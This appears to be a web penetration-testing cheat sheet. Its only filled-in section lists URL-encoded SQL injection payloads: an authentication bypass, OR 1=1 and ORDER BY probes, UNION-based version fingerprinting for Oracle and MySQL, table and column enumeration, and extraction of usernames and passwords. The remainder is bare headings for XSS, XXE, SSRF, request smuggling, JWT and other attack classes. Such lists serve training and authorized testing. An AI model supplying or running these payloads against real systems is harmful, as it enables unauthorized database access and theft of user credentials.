Payloads
SQLi
UNION SQLi
#clause bypass
'+OR+1=1--
#login bypass
administrator'--
#union detection
'+ORDER+BY+1--
'+ORDER+BY+2--
'+ORDER+BY+3--
'+UNION+SELECT+NULL,NULL--
'+UNION+SELECT+'abcdef',NULL,NULL--
#Oracle version
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
#MySQL and Microsoft version
'+UNION+SELECT+@@version,+NULL#
#Tables names
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
#Tables names Oracle
'+UNION+SELECT+table_name,NULL+FROM+all_tables--
'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--
#More columns in one
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
Blind SQLi
Blind error based SQLi
Visible Error
Blind Time-based
Out of Band Interactions
SQLI inside XML
XSS
DOM-based XSS
XSS web messages
Reflected
Stored
XSS stealers
XSS to CSRF
CSRF
CSWSH - Cross-Site WebSocket Hijacking
CORS
XXE
Blind XXE
External DTD XXE
XInclude injection
XXE image upload
SSRF
Request Smuggling
CL.TE
TE.CL
H2.CL
H2.TE
H2 CRLF Injeciton
H2.TE desync v10a h2path
CL.0
OS cmd injection
SSTI
Path Traversal
Authentication
Web Sockets
oAuth
Deserialization
JWT
Prototype pollution
Last updated
